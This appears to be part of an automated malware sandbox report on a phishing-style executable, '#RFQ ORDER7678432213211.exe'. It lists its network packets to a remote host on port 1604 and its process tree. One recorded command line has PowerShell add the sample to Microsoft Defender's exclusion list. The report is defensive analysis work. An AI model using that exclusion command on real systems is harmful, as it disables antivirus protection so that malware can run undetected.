                      Jul 20, 2021 08:15:11.042488098 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.042541981 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.042610884 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.051312923 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.051350117 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.051445961 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.061551094 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.065103054 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.071321011 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.071355104 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.071389914 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.071424961 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.082082033 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.082187891 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.091312885 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.091470003 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.101659060 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.101700068 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.101752043 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.101783037 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.111475945 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.111500025 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.111558914 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.111589909 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.121119976 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.121238947 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.131237984 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.131287098 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.131400108 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.141343117 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.141455889 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.151463985 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.151560068 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.161391973 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.161438942 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.161488056 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.161523104 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.171425104 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.171453953 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.171619892 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.171663046 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.182446003 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.182487965 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.182636023 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.182682037 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.410948992 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.411103010 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.440898895 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.488111019 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.701021910 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.721139908 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.721366882 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.741347075 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.760858059 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.760943890 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.771022081 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.791305065 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.791440010 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.802139044 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.811346054 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.811539888 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.821625948 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.831374884 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.831466913 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.841327906 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.841365099 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.841447115 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.851672888 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.861196041 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.861234903 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.861294031 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.871239901 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.872143030 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.881093979 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.891223907 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.891248941 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.891354084 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.901220083 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.901249886 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.901386023 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.911360025 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.911498070 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.921257973 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.921288013 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.921433926 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.931232929 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.972532034 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:11.972791910 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.981277943 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:11.981359959 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.001874924 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.001916885 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.002099037 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.031234980 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.040919065 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.041003942 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.062489033 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.062525034 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.062613964 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.071293116 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.081526995 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.081588984 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.081649065 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.091052055 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.091187954 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.101142883 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.112447977 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.112675905 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.121646881 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.121675014 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.121747971 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.131470919 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.141230106 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.141252995 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.141422987 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.151292086 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.151329041 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.151473999 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.161238909 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.161290884 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.161365032 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.171830893 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.171921968 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.181248903 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.191458941 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.192204952 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.221077919 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.231277943 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.231503010 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.240979910 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.261162996 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.261378050 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.271066904 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.281161070 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.281260014 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.291282892 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.311229944 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.311265945 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.311456919 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.331145048 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.331341982 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.340801001 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.351147890 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.351269007 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.361082077 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.361110926 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.361224890 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.371241093 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.381059885 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.381102085 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.381191015 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.391076088 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.391180992 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.401088953 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.401118994 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.401243925 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.411132097 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.411169052 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.411351919 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.421153069 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.430905104 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.431039095 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.431240082 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.441174030 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.441384077 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.450834036 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.500880003 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.500998020 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.541244030 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.541307926 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.541395903 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.551187038 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.561136007 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.561183929 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.561306000 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.571254969 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.571338892 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.571352005 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.581306934 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.581391096 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.591202974 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.591260910 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.591331959 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.601232052 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.601274014 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.601361036 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.610910892 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.631246090 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.631372929 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.642661095 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.642688036 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.642807961 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.651254892 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.651288033 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.651349068 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.661279917 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.671145916 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.671186924 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.671257973 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.681181908 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.681217909 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.681298971 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.691231966 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.691333055 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.701154947 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.701189995 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.701303005 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.731164932 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.741308928 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.741393089 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.871253967 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.881119967 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.881186962 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:12.881222010 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:12.925719023 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.020678997 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.060709953 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.060828924 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.090953112 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.111094952 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.111251116 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.150985956 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.170840979 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.170937061 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.190968990 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.238297939 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.250850916 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.250917912 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.251035929 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.260835886 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.271184921 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.271312952 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.280899048 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.291049957 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.291174889 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.291181087 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.331990957 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.340873957 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.340904951 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.340939045 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.340986967 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.341006041 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.341018915 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.341069937 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.351070881 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.351176023 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.361145973 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.361176014 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.361277103 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.371273994 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.371311903 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.371448994 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.381097078 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391231060 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391284943 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.391463995 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.401159048 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.401357889 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.411272049 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.411330938 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.411454916 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.421226978 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.421334028 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.421403885 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.431205988 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.440951109 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.440989971 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.441126108 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.490989923 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.501095057 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.501204014 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.510844946 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.520997047 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.521034002 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.521091938 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.531198978 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.531358004 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.540846109 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.581993103 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.621262074 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.621282101 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.621360064 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.631202936 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.641153097 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.641175985 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.641269922 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.652538061 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.652642012 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.652970076 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.661276102 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.661631107 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.671008110 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.671041012 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.671108961 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.681282997 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.681323051 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.681430101 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.691358089 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.701184988 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.701226950 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.701294899 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.713443995 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.713500023 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.713510036 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.721096039 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.721160889 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.731184006 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.731218100 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.731312990 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.741003990 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:13.785124063 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:13.934895992 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:14.566474915 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:15.332145929 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:15.608280897 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:15.778794050 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:15.804758072 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:16.058226109 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:16.065572023 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:16.298651934 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:16.301115036 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:16.540647984 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:16.540760040 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:16.909106016 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:16.909485102 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:17.208445072 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:18.148340940 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:18.191715002 CEST497461604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:15:18.608194113 CEST160449746194.5.98.120192.168.2.3
                      Jul 20, 2021 08:15:18.660955906 CEST497461604192.168.2.3194.5.98.120

                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: #RFQ ORDER7678432213211.exe PID: 4900 Parent PID: 5592

                      General

                      Start time:08:13:02
                      Start date:20/07/2021
                      Path:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
                      Imagebase:0x1a0000
                      File size:1084928 bytes
                      MD5 hash:2F286CD817B368E8A747E8F0D8F28825
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low

                      Chronological Activities

                      Analysis Process: powershell.exe PID: 6052 Parent PID: 4900

                      General

                      Start time:08:13:34
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 1532 Parent PID: 6052

                      General

                      Start time:08:13:34
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
